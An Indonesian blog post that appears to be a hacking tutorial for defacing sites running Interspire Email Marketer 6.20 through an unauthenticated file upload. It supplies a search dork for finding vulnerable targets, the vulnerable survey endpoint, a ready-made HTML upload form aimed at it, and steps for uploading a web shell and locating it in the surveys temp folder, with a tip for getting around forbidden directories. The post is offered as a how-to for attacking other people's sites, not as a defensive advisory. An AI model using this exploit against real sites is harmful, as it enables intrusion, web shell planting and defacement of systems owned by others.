Deface Interspire Email Marketer 6.20 - CSRF File Upload


Bismillahirahmanirahin . .
Assalamualaikum sobat IT kali ini saya akan memberikan tutorial deface Interspire email marketer yang lagi buming2 katanya . Tapi temen - temen kebingungan dengan poc ini padahal cukup sederhana poc ini sob. langsung aja skuylah
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
PoC :  Interspire Email Marketer 6.20 - CSRF File Upload
Dork: intext:"Powered by Hairyspire Email Marketer 6.1.4" (use your brain)
Testing: site.com/admin//temp/surveys/
Exploit: surveys_submit.php?formId=[number]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Pertama siapkan dulu targetnya setelah itu kita test apakah vuln atau tidak yaitu caranya dilihat dari direktori /admin//temp/surveys/ seperti gambar dibawah ini
Pada gambar diatas kita menemukan angka "999999999" maka angka tersebut kita masukan kedalam exploit jika tidak menemukan folder berangka masukan saja angka berapapun bebas nanti otomatis akan create folder angka tersebut pokoknya yang paling penting ada folder "surveys" nya, scriptnya ada dibawah sini

Script csrf:
<!DOCTYPE HTML>
<html lang="en-US">
<head>
    <meta charset="UTF-8">
    <title></title>
</head>
<body>
<form action="http://target.com/surveys_submit.php?formId=999999999" method="post" enctype="multipart/form-data">
    <input type="file" name="widget[0][field][][value]">
    <input type="submit" value="submit" name="submit">
</form>
</body>
</html>
Langsung saja pilih shell kalian kemudian submit.
kemudian kita cek folder shell kita biasanya berada pada folder angka terakhir yaitu pada folder /admin//temp/surveys/999999999 (999999999 adalah angka yang tadi
nah angka folder terakhir adalah 21 jadi bisa kemungkinan shell kita ada disana


tinggal cek saja
Vakekok eheheh .. yahh sampai disini saha yah sobat IT mohon maaf bila ada kesalahan
termakasih telah berkunjung.

Catatan : Kalo directorinya 403 forbiden coba discan pake file finder download sourcenya
Subscribe To Get Best Articles!

Jika menurut kalian artikel di blog ini berkualitas dan bermanfaat, silahkan berlangganan artikel terbaru melalui pesan masuk email anda secara gratis.

No comments:

Post a Comment

" Terimakasih telah mengunjungi blog kami ,, silahkan tinggalkan komentar untuk menghargai jerit payah penulis ^_^ "